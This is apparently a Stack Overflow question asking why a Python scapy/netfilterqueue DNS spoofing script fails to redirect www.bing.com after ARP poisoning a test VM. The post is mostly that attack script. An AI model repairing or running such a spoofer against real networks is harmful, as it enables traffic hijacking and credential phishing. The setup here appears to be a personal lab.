# DNS spoofer with websites

Tags: python, dns, scapy, spoofing, penetration-testing

I'm writing new DNS Spoofer code and test it with `www.bing.com` but it says "Server Not Found"

I knew the target IP (which is my VM) and poisoned the ARP connection, then tried the program with iptables enabled, but it doesn't work although I can see the package analysed with `package.show()`.

```
import netfilterqueue
import scapy.all as scapy


def procced_package(package):
    scapy_package = scapy.IP(package.get_payload())
    if scapy_package.haslayer(scapy.DNSRR):
        link = scapy_package[scapy.DNSQR].qname
        print("Searching...")
        if "www.bing.com" in link:
            #print(scapy_package.show())
            print("[+] Spoofing Target")
            answer = scapy.DNSRR(rrname=link, rdata="192.168.1.12")
            scapy_package[scapy.DNS].ar = answer
            scapy_package[scapy.DNS].ancount = 1
            print("[+] Found The Target!")

            del scapy_package[scapy.IP].len
            del scapy_package[scapy.IP].chksum
            del scapy_package[scapy.UDP].len
            del scapy_package[scapy.UDP].chksum
            package.set_payload(str(scapy_package))
    package.accept()


queue = netfilterqueue.NetfilterQueue()
queue.bind(1, procced_package)
print("Waiting...")
queue.run()
```

The result is "Server Not Found" only for my target

Comment: [How to ask a good question](https://stackoverflow.com/help/how-to-ask) & [What topics can I ask about here?](https://stackoverflow.com/help/on-topic) & [Minimal, Reproducible Example](https://stackoverflow.com/help/minimal-reproducible-example)  What specifically is your question?  Edit the question and state it explicitly.

Comment: The web page dose not work after my DNS spoffer and this code is my DNS spoffer, so where is problem with code ?